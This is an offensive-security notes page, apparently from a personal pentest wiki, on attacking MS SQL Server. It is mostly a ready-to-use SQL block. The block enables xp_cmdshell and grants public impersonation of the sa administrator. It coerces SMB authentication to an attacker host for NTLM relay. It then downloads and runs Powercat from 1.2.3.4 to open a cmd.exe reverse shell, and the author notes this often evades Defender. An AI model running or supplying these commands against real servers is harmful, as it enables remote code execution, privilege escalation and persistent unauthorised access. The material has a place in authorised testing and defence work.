# MS SQL ## Useful Metasploit modules ![[Metasploit MS SQL modules|spells/Metasploit MS SQL modules]] ## xp\_cmdshell MS SQL includes the `xp_cmdshell` "extended" procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. [[Powercat]], a re-implementation of [[netcat]] in pure PowerShell, is useful here. ```sql -- Enable MS SQL "advanced options" -- sp_configure 'Show Advanced Options',1; RECONFIGURE; -- Enable xp_cmdshell stored procedure -- sp_configure 'xp_cmdshell',1; RECONFIGURE; --- OPTIONAL: Allow all users to impersonate the "sa" (database --- administrator) user (this enables low-privilege website users --- to run xp_cmdshell) --- # MS SQL USE master; GRANT impersonate ON login::sa TO [public]; -- Coerce MS SQL to connecting using SMB to an attacker at -- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't -- turned on, that is). -- EXEC master.sys.xp_dirtree '\\1.2.3.4\share',1,1; -- Download an execute Powercat from an attacker at 1.2.3.4 -- (using the built-in Python web server) and connect back to -- that IP on port 1337. Note that this in general should be -- caught by IDS/IDP systems, including Defender... But I've -- actually had it work for me out-of-the-box a surprising -- number of times. -- EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"' ```